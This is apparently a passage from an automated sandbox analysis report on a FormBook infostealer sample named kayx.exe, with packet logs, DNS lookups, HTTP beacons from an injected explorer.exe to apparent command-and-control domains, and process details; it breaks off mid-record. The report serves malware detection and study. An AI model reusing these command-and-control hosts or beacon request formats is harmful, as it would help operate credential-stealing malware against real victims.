Nov 20, 2020 16:33:35.156687975 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.156687975 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.156697989 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.156733990 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.156752110 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.156770945 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.156794071 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.156810045 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.156824112 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.156847954 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.156868935 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.156884909 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.156912088 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.156924963 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.156944036 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.156963110 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.156994104 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.157010078 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.157052994 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.157052994 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.157068014 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.157089949 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.157124996 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.157129049 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.157145023 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.157166958 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.157175064 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.157203913 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.157224894 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.157243013 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.157263041 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.157280922 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.157300949 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.157329082 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.157346964 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.157371044 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.157394886 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.157437086 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.157437086 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.157501936 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:41.419718027 CET	49744	80	192.168.2.3	184.168.131.241
Nov 20, 2020 16:33:41.582705021 CET	80	49744	184.168.131.241	192.168.2.3
Nov 20, 2020 16:33:41.582819939 CET	49744	80	192.168.2.3	184.168.131.241
Nov 20, 2020 16:33:44.429061890 CET	49744	80	192.168.2.3	184.168.131.241
Nov 20, 2020 16:33:44.589750051 CET	80	49744	184.168.131.241	192.168.2.3
Nov 20, 2020 16:33:44.589987993 CET	49744	80	192.168.2.3	184.168.131.241
Nov 20, 2020 16:33:44.590300083 CET	49744	80	192.168.2.3	184.168.131.241
Nov 20, 2020 16:33:44.750721931 CET	80	49744	184.168.131.241	192.168.2.3
Nov 20, 2020 16:33:44.781363964 CET	80	49744	184.168.131.241	192.168.2.3
Nov 20, 2020 16:33:44.781443119 CET	80	49744	184.168.131.241	192.168.2.3
Nov 20, 2020 16:33:44.781826973 CET	49744	80	192.168.2.3	184.168.131.241
Nov 20, 2020 16:33:44.781961918 CET	49744	80	192.168.2.3	184.168.131.241
Nov 20, 2020 16:33:44.942574024 CET	80	49744	184.168.131.241	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2020 16:31:37.716008902 CET	65110	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:31:37.753664970 CET	53	65110	8.8.8.8	192.168.2.3
Nov 20, 2020 16:31:38.886259079 CET	58361	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:31:38.913505077 CET	53	58361	8.8.8.8	192.168.2.3
Nov 20, 2020 16:31:40.199696064 CET	63492	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:31:40.226741076 CET	53	63492	8.8.8.8	192.168.2.3
Nov 20, 2020 16:31:41.282166958 CET	60831	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:31:41.309237003 CET	53	60831	8.8.8.8	192.168.2.3
Nov 20, 2020 16:31:42.732551098 CET	60100	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:31:42.759645939 CET	53	60100	8.8.8.8	192.168.2.3
Nov 20, 2020 16:31:43.578700066 CET	53195	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:31:43.605797052 CET	53	53195	8.8.8.8	192.168.2.3
Nov 20, 2020 16:31:44.620488882 CET	50141	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:31:44.647614002 CET	53	50141	8.8.8.8	192.168.2.3
Nov 20, 2020 16:31:45.626663923 CET	53023	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:31:45.653712034 CET	53	53023	8.8.8.8	192.168.2.3
Nov 20, 2020 16:31:46.632806063 CET	49563	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:31:46.659962893 CET	53	49563	8.8.8.8	192.168.2.3
Nov 20, 2020 16:31:47.462408066 CET	51352	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:31:47.489501953 CET	53	51352	8.8.8.8	192.168.2.3
Nov 20, 2020 16:31:48.805653095 CET	59349	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:31:48.832789898 CET	53	59349	8.8.8.8	192.168.2.3
Nov 20, 2020 16:31:49.804553032 CET	57084	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:31:49.831583977 CET	53	57084	8.8.8.8	192.168.2.3
Nov 20, 2020 16:31:59.875031948 CET	58823	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:31:59.902120113 CET	53	58823	8.8.8.8	192.168.2.3
Nov 20, 2020 16:32:01.389939070 CET	57568	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:32:01.416979074 CET	53	57568	8.8.8.8	192.168.2.3
Nov 20, 2020 16:32:07.183087111 CET	50540	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:32:07.218885899 CET	53	50540	8.8.8.8	192.168.2.3
Nov 20, 2020 16:32:10.353229046 CET	54366	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:32:10.380398035 CET	53	54366	8.8.8.8	192.168.2.3
Nov 20, 2020 16:32:10.462378979 CET	53034	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:32:10.489438057 CET	53	53034	8.8.8.8	192.168.2.3
Nov 20, 2020 16:32:12.298270941 CET	57762	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:32:12.333836079 CET	53	57762	8.8.8.8	192.168.2.3
Nov 20, 2020 16:32:27.295954943 CET	55435	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:32:27.322926044 CET	53	55435	8.8.8.8	192.168.2.3
Nov 20, 2020 16:32:28.421916962 CET	50713	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:32:28.426913023 CET	56132	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:32:28.454065084 CET	53	56132	8.8.8.8	192.168.2.3
Nov 20, 2020 16:32:28.457412958 CET	53	50713	8.8.8.8	192.168.2.3
Nov 20, 2020 16:32:29.369177103 CET	58987	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:32:29.412585020 CET	53	58987	8.8.8.8	192.168.2.3
Nov 20, 2020 16:32:34.747100115 CET	56579	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:32:34.784126043 CET	53	56579	8.8.8.8	192.168.2.3
Nov 20, 2020 16:33:16.535996914 CET	60633	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:33:16.563107967 CET	53	60633	8.8.8.8	192.168.2.3
Nov 20, 2020 16:33:34.681273937 CET	61292	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:33:34.720000029 CET	53	61292	8.8.8.8	192.168.2.3
Nov 20, 2020 16:33:40.177280903 CET	63619	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:33:41.199937105 CET	63619	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:33:41.229835987 CET	53	63619	8.8.8.8	192.168.2.3
Nov 20, 2020 16:33:41.263674021 CET	53	63619	8.8.8.8	192.168.2.3
Nov 20, 2020 16:33:49.797297955 CET	64938	53	192.168.2.3	8.8.8.8
Nov 20, 2020 16:33:49.852216005 CET	53	64938	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 20, 2020 16:33:34.681273937 CET	192.168.2.3	8.8.8.8	0x1cd1	Standard query (0)	www.ghoster.agency	A (IP address)	IN (0x0001)
Nov 20, 2020 16:33:40.177280903 CET	192.168.2.3	8.8.8.8	0xa019	Standard query (0)	www.jibenentreprenad.mobi	A (IP address)	IN (0x0001)
Nov 20, 2020 16:33:41.199937105 CET	192.168.2.3	8.8.8.8	0xa019	Standard query (0)	www.jibenentreprenad.mobi	A (IP address)	IN (0x0001)
Nov 20, 2020 16:33:49.797297955 CET	192.168.2.3	8.8.8.8	0x9e95	Standard query (0)	www.amtpsychology.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 20, 2020 16:33:34.720000029 CET	8.8.8.8	192.168.2.3	0x1cd1	No error (0)	www.ghoster.agency	ext-sq.squarespace.com		CNAME (Canonical name)	IN (0x0001)
Nov 20, 2020 16:33:34.720000029 CET	8.8.8.8	192.168.2.3	0x1cd1	No error (0)	ext-sq.squarespace.com		198.185.159.141	A (IP address)	IN (0x0001)
Nov 20, 2020 16:33:34.720000029 CET	8.8.8.8	192.168.2.3	0x1cd1	No error (0)	ext-sq.squarespace.com		198.49.23.141	A (IP address)	IN (0x0001)
Nov 20, 2020 16:33:41.229835987 CET	8.8.8.8	192.168.2.3	0xa019	No error (0)	www.jibenentreprenad.mobi	jibenentreprenad.mobi		CNAME (Canonical name)	IN (0x0001)
Nov 20, 2020 16:33:41.229835987 CET	8.8.8.8	192.168.2.3	0xa019	No error (0)	jibenentreprenad.mobi		184.168.131.241	A (IP address)	IN (0x0001)
Nov 20, 2020 16:33:41.263674021 CET	8.8.8.8	192.168.2.3	0xa019	No error (0)	www.jibenentreprenad.mobi	jibenentreprenad.mobi		CNAME (Canonical name)	IN (0x0001)
Nov 20, 2020 16:33:41.263674021 CET	8.8.8.8	192.168.2.3	0xa019	No error (0)	jibenentreprenad.mobi		184.168.131.241	A (IP address)	IN (0x0001)
Nov 20, 2020 16:33:49.852216005 CET	8.8.8.8	192.168.2.3	0x9e95	Name error (3)	www.amtpsychology.com	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.ghoster.agency

www.jibenentreprenad.mobi

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49743	198.185.159.141	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 20, 2020 16:33:34.833543062 CET	6320	OUT	GET /bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV&Fxl0dR=KdShEXiX HTTP/1.1 Host: www.ghoster.agency Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 20, 2020 16:33:34.942893982 CET	6321	IN	HTTP/1.1 400 Bad Request content-length: 77564 expires: Thu, 01 Jan 1970 00:00:00 UTC pragma: no-cache cache-control: no-cache, must-revalidate content-type: text/html; charset=UTF-8 connection: close date: Fri, 20 Nov 2020 15:33:34 UTC x-contextid: Bwdk82gG/KU21r2Fa server: Squarespace Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
Nov 20, 2020 16:33:34.942939043 CET	6322	IN	Data Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
Nov 20, 2020 16:33:34.942975044 CET	6324	IN	Data Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34 Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
Nov 20, 2020 16:33:34.943013906 CET	6325	IN	Data Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75 Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
Nov 20, 2020 16:33:34.943052053 CET	6326	IN	Data Raw: 54 2b 76 50 36 71 7a 4a 4c 38 6a 49 6d 56 38 74 4c 35 42 70 70 6c 34 4b 4d 79 4c 52 30 53 6c 45 57 53 55 6b 79 45 70 57 55 32 53 59 72 7a 53 46 56 62 6d 5a 55 6e 39 6d 67 4a 73 6e 73 2f 39 59 4a 4a 53 66 31 36 42 78 45 71 67 65 4a 47 69 52 61 6b Data Ascii: T+vP6qzJL8jImV8tL5Bppl4KMyLR0SlEWSUkyEpWU2SYrzSFVbmZUn9mgJsns/9YJJSf16BxEqgeJGiRakKhDohWJejVmCgoZuPbCdbWci9RCpCaQWopUC1I5Vo+KwuY9EkFjK+Pn7Pgp943g2wHJmCJexrmFW8wMM3hgTsiI2WOlDmDVN8dYv07qeXcakOmkHUd/Je1qJH5IHealUa6ivUYq8aNJpvH6mDmiyswfsF1SOfqTZC
Nov 20, 2020 16:33:34.943099976 CET	6328	IN	Data Raw: 30 6f 33 36 79 6e 57 48 74 55 67 6d 41 6c 73 76 78 65 41 43 50 46 30 67 33 38 72 32 67 44 2f 53 44 51 54 41 66 4c 41 53 4c 51 41 49 73 42 6b 76 42 63 70 43 55 69 34 69 77 67 51 67 76 4a 4d 4b 7a 59 63 30 52 34 51 56 45 4f 45 79 45 72 35 55 7a 32 Data Ascii: 0o36ynWHtUgmAlsvxeACPF0g38r2gD/SDQTAfLASLQAIsBkvBcpCUi4iwgQgvJMKzYc0R4QVEOEyEr5Uz2NkJcJ60SQ5M0j8fvExWEnWDSoARGVajUkO0jUTbRbSNRNslyp4ghV7I9xB+1OJ3TKKwBkDLQkZUCrBZZpwmggxeZ5kbkhZ8SGFrEKaL4Q/hr4c/hL9eqmHqkQBoRjFZDlObY4rDFIPJg6kSJg8mvJYY3nqwwCAhul
Nov 20, 2020 16:33:34.943140984 CET	6329	IN	Data Raw: 54 54 5a 74 48 65 6a 7a 36 4f 49 4a 6c 47 67 56 4a 6e 33 33 36 6b 2b 6c 6a 64 57 73 4f 4f 75 76 44 50 7a 5a 70 45 4c 4c 45 4a 76 65 6f 73 4d 77 39 4c 74 42 54 47 4c 48 43 74 52 46 47 30 4b 49 39 73 4c 45 61 4c 4a 4e 6a 6d 53 4c 4c 64 4b 62 4f 4f Data Ascii: TTZtHejz6OIJlGgVJn336k+ljdWsOOuvDPzZpELLEJveosMw9LtBTGLHCtRFG0KI9sLEaLJNjmSLLdKbOOBjxD5sWdZ2frGDS4ymqvMUCL/AUczyLicVtGpIF+E9M3uBN/kqNUzzNUxziKc7xb/7Dv2lRosCzuBSxOcg1Duh54VMwuksOk0LWTCioLMZSVi4YHYLt8EWLX+a5jSV45U3Bq1lRsK1mUlG5kMUpCKw15oaxSvZzUt
Nov 20, 2020 16:33:34.943180084 CET	6330	IN	Data Raw: 31 69 75 4f 48 4a 65 4e 34 38 66 32 2b 4b 4c 4f 6b 53 51 47 46 69 74 78 6d 58 61 36 58 30 6a 6c 58 6e 4f 63 77 50 6a 6d 78 73 37 35 4f 6c 77 4c 58 52 56 65 34 71 63 37 6b 4a 34 67 53 4c 69 6b 4c 68 2f 65 49 57 63 44 69 6f 4d 69 33 5a 54 57 61 47 Data Ascii: 1iuOHJeN48f2+KLOkSQGFitxmXa6X0jlXnOcwPjmxs75OlwLXRVe4qc7kJ4gSLikLh/eIWcDioMi3ZTWaGocqAaE+t4m21f+m62DcVdpbcY8ek4hAUZGijXjL9b3EwlrdruaGO1s8EJfERgjVnrTxM1cgzZnjim/5FBpXxzmIQxlHbJ+UVUWFHH16H8gnvLSPmCizWviQum7sRlOQuVlY7+uLrI/PSucu+5TnKT9aSerjVgdlZQ
Nov 20, 2020 16:33:34.943217993 CET	6332	IN	Data Raw: 56 72 56 37 31 61 31 44 44 47 74 55 43 4c 64 49 53 4c 64 4e 79 72 64 52 71 72 64 56 36 62 64 52 6d 62 64 55 4a 2b 6d 33 39 6a 67 37 71 73 45 37 55 55 62 31 48 50 30 51 4d 6b 61 64 49 69 54 49 74 74 4e 4b 67 6a 58 59 6d 4d 5a 6b 70 54 47 55 61 63 Data Ascii: VrV71a1DDGtUCLdISLdNyrdRqrdV6bdRmbdUJ+m39jg7qsE7UUb1HP0QMkadIiTIttNKgjXYmMZkpTGUac1jFatbxSxzjT/lb/Y3O0Jk6XxfqEr1Gr9fVul436RY9oIeTXJJPSklzUk8aSXvSkfQkg8kQIkeeuRzkJL0rKSa9yShiAWkyFMZ2rlClRgvTmTG24xrv+Cv8Ooc5kb/0vn+lv/bef6uTdYpO1Wk6XWfrXJ0Xexa8a9
Nov 20, 2020 16:33:34.943255901 CET	6333	IN	Data Raw: 6c 4a 4b 61 63 6a 6e 77 32 38 51 65 6d 79 68 2b 61 43 6e 39 75 79 6b 53 79 59 76 6f 72 59 76 72 70 6d 48 34 68 70 74 38 58 30 31 64 4d 76 78 44 54 37 34 76 70 4b 36 61 76 6d 48 36 69 53 4a 6b 75 30 41 58 55 64 4b 45 75 70 45 55 58 36 53 4c 71 75 Data Ascii: lJKacjnw28Qemyh+aCn9uykSyYvorYvrpmH4hpt8X01dMvxDT74vpK6avmH6iSJku0AXUdKEupEUX6SLqulgX06pLdAkNXapLadNluox2vUKvYI1eqVeyS6/Sq1irV+vVrNNr9BrW67V6LRv0Or2OjXq9Xs8mvUFvYLPeqDeyJe5Xk67W1YzqGl1DSdfqWkZ0na5jWNfrembpBt3ATN2oGxnSTbqJZt2sm5mhW3QLc3SP7mGr7t
Nov 20, 2020 16:33:35.049237967 CET	6334	IN	Data Raw: 6a 36 2f 58 49 65 6b 4d 2f 31 41 38 70 49 4a 4a 6b 4d 58 4d 41 6d 42 45 4b 61 2b 4c 54 51 76 4c 41 41 41 33 58 49 48 31 4d 41 72 61 79 6e 69 33 4d 5a 6a 47 62 32 63 67 6d 51 36 7a 70 72 4b 55 66 45 4d 52 53 36 48 41 6f 67 4d 59 71 52 5a 6f 4d 54 Data Ascii: j6/XIekM/1A8pIJJkMXMAmBEKa+LTQvLAAA3XIH1MArayni3MZjGb2cgmQ6zprKUfEMRS6HAogMYqRZoMTWQZIccoRFJhG7CMlZQouypU/XmVWcnqSGnJVXYtZy4d8X+nJfSygrEV55+41jGZGtBg3T/8W3S8m4yt/uMYQvxDS+OAyIyRA1aybAKlcVYRxPlL4+DqGKOXla5+lo2XKE0oKI9V6e+VqE4oWDlWq/7BGnbBSpYCqy

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49744	184.168.131.241	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 20, 2020 16:33:44.590300083 CET	6402	OUT	GET /bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX HTTP/1.1 Host: www.jibenentreprenad.mobi Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 20, 2020 16:33:44.781363964 CET	6403	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.16.1 Date: Fri, 20 Nov 2020 15:33:44 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Location: https://www.jiben.se/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: kayx.exe PID: 6524 Parent PID: 5776

General

Start time:	16:31:41
Start date:	20/11/2020
Path:	C:\Users\user\Desktop\kayx.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\kayx.exe'
Imagebase:	0xec0000
File size:	432640 bytes
MD5 hash:	A80E73A824B655491F54278B7A29467D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: kayx.exe PID: 6932 Parent PID: 6524

General

Start time:	16:32:45
Start date:	20/11/2020
Path:	C:\Users\user\Desktop\kayx.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\kayx.exe
Imagebase:	0x200000
File size:	432640 bytes
MD5 hash:	A80E73A824B655491F54278B7A29467D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: kayx.exe PID: 6916 Parent PID: 6524

General

Start time:	16:32:46
Start date:	20/11/2020
Path:	C:\Users\user\Desktop\kayx.exe
Wow64 process (32bit):	false
